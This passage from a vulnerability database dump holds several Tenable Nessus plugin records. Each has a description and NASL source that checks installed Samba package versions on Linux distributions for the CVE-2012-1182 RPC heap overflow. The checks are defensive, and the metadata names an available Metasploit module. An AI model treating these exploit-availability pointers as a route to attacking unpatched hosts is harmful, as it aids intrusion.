Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003301.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:30", "description": "This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6 New samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-05-16T00:00:00", "type": "nessus", "title": "Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-6382.NASL", "href": "https://www.tenable.com/plugins/nessus/59098", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6382.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n\n script_name(english:\"Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=804093\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a742831d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba4-4.0.0-38.alpha16.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:57:43", "description": "Samba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba3x", "p-cpe:/a:fermilab:scientific_linux:samba3x-client", "p-cpe:/a:fermilab:scientific_linux:samba3x-common", "p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba3x-doc", "p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba3x-swat", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61297);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=565\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fceb855\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:35", "description": "According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities.\n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2012-04-12T00:00:00", "type": "nessus", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "id": "6443.PRM", "href": "https://www.tenable.com/plugins/nnm/6443", "sourceData": "Binary data 6443.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:42", "description": "A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size values which allows attackers to write beyond the allocated array size. (CVE-2012-1182)\n\nAlso the following bugs have been fixed :\n\n - Samba printer name marshalling problems. (bnc#722663)\n\n - mount.cifs: properly update mtab during remount.\n (bnc#747906)\n\n - s3: compile IDL files in autogen, some configure tests need this.\n\n - Fix incorrect types in the full audit VFS module. Add null terminators to audit log enums. (bnc#742885)\n\n - Do not map POSIX execute permission to Windows FILE_READ_ATTRIBUTES; (bso#8631);. (bnc#732572)", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Samba (SAT Patch Number 6124)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:cifs-mount", "p-cpe:/a:novell:suse_linux:11:ldapsmb", "p-cpe:/a:novell:suse_linux:11:libsmbclient0", "p-cpe:/a:novell:suse_linux:11:libsmbclient0-32bit", "p-cpe:/a:novell:suse_linux:11:libtalloc1", "p-cpe:/a:novell:suse_linux:11:libtalloc1-32bit", "p-cpe:/a:novell:suse_linux:11:libtdb1", "p-cpe:/a:novell:suse_linux:11:libtdb1-32bit", "p-cpe:/a:novell:suse_linux:11:libwbclient0", "p-cpe:/a:novell:suse_linux:11:libwbclient0-32bit", "p-cpe:/a:novell:suse_linux:11:samba", "p-cpe:/a:novell:suse_linux:11:samba-32bit", "p-cpe:/a:novell:suse_linux:11:samba-client", "p-cpe:/a:novell:suse_linux:11:samba-client-32bit", "p-cpe:/a:novell:suse_linux:11:samba-doc", "p-cpe:/a:novell:suse_linux:11:samba-krb-printing", "p-cpe:/a:novell:suse_linux:11:samba-winbind", "p-cpe:/a:novell:suse_linux:11:samba-winbind-32bit", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_CIFS-MOUNT-120411.NASL", "href": "https://www.tenable.com/plugins/nessus/58764", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58764);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"SuSE 11.1 Security Update : Samba (SAT Patch Number 6124)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution flaw in Samba has been fixed :\n\n - PIDL based autogenerated code uses client supplied size\n values which allows attackers to write beyond the\n allocated array size. (CVE-2012-1182)\n\nAlso the following bugs have been fixed :\n\n - Samba printer name marshalling problems. (bnc#722663)\n\n - mount.cifs: properly update mtab during remount.\n (bnc#747906)\n\n - s3: compile IDL files in autogen, some configure tests\n need this.\n\n - Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums. (bnc#742885)\n\n - Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631);. (bnc#732572)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=742885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=747906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1182.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6124.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:cifs-mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtalloc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtalloc1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n 